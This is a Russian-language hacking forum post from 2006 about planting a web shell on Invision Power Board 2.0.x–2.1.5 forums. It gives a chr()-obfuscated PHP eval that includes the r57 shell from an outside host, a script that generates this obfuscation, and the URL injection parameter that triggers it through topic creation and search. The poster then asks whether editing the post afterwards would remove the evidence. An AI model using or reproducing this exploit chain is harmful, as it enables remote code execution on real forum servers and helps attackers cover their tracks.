| Sulf aka Joker |
08.07.2006 14:49 |
Вопросик по шеллу
Вот шелл для ипб 2.0.х - 2.1.5.
Код:
eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //
Значиццо выглядит это так :
Код:
<?php $str="include \"http://rst.void.ru/download/r57shell.txt\";/*";// */ echo "eval( "; for($i=0;$i<strlen($str);$i++) { echo "chr(".ord($str[$i])."). "; } echo "chr(".ord(" ").") ); //"; ?>
Тут созревает вопрос : шелл заливается через создание темы, поиск темы, и добавки кода вызова шелла :
Код:
&lastdate=z|eval.*?%20//)%23e%00
Тоесть, если я сменю состав сообщения, вместо кода я впишу 123 и код вытру - то шелл не будет присутствовать не серве, тем самым следы можно замести? Я так понимаю хак работает через внешний шелл и не подгружает его в сам форум. |
